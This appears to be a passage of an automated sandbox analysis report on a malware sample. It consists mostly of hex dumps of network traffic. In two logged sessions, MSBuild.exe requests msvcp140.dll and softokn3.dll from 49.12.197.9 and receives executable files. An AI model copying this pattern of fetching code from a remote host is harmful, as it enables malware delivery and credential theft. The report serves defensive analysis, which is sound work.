                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                                                                                                                    Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                                                                                                                    Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                                                                                                                    Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    13192.168.2.85624949.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:54 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 450024
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:54 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                                                                                                                    Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                                                                    Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                                                                    Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                                                                    Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                                                                    Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                                                                    Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                                                                                    Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                                                                    2024-10-03 13:14:54 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                                                                    Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                                                                    2024-10-03 13:14:55 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                                                                    Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    14192.168.2.85625049.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:55 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:56 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 257872
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:56 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                                                                                    Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                                                                                    Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                                                                                    Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                                                                    Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                                                                    2024-10-03 13:14:56 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                                                                    Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
